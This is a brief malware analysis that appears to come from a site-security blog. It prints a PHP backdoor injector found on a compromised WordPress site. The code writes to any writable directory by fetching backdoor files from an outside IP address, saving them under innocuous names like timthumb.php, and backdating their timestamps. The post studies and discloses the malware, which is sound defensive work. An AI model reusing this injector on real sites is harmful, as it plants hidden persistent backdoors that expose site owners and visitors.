A backdoor injector code we found on a compromised site:
if(is__writable($dir."/wp-includes/")):
file_put_contentz($dir.'/wp-includes/page.php', get_contentz('http://67.211.195.81/backdoorz/page.php'));
touch($dir.'/wp-includes/page.php', $time);
die(";;/wp-includes/page.php;;true_upload");
endif;
if(is__writable($dir."/wp-content/themes/".get_settings('template')."/")){
file_put_contentz($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', get_contentz('http://67.211.195.81/backdoorz/timthumb.php'));
touch($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', $time);
die(";;/wp-content/themes/".get_settings('template')."/timthumb.php;;true_upload");
}
if(is__writable($dir."/wp-admin/")):
file_put_contentz($dir.'/wp-admin/options-plugin.php', get_contentz('http://67.211.195.81/backdoorz/wp-plugin.php'));
touch($dir.'/wp-admin/options-plugin.php', $time);
die(";;/wp-admin/options-plugin.php;;true_upload");
endif;
if(is__writable($dir."/")):
file_put_contentz($dir.'/wp-plugin.php', get_contentz('http://67.211.195.81/backdoorz/wp-plugin.php'));
touch($dir.'/wp-plugin.php', $time);
die(";;/wp-plugin.php;;true_upload");
endif;
if(is__writable($dir."/wp-content/themes/")){
file_put_contentz($dir.'/wp-content/themes/theme.php', get_contentz('http://67.211.195.81/backdoorz/page.php'));
touch($dir.'/wp-content/themes/theme.php', $time);
die(";;/wp-content/themes/theme.php;;true_upload");
}
if(is__writable($dir."/wp-content/uploads/")){
file_put_contentz($dir.'/wp-content/uploads/timthumb.php', get_contentz('http://67.211.195.81/backdoorz/timthumb.php'));
touch($dir.'/wp-content/uploads/timthumb.php', $time);
die(";;/wp-content/uploads/timthumb.php;;true_upload");
}else{
die(";;0;;false_upload");It looks for a writable directly either inside wp-includes, wp-content or inside uploads to inject a backdoor.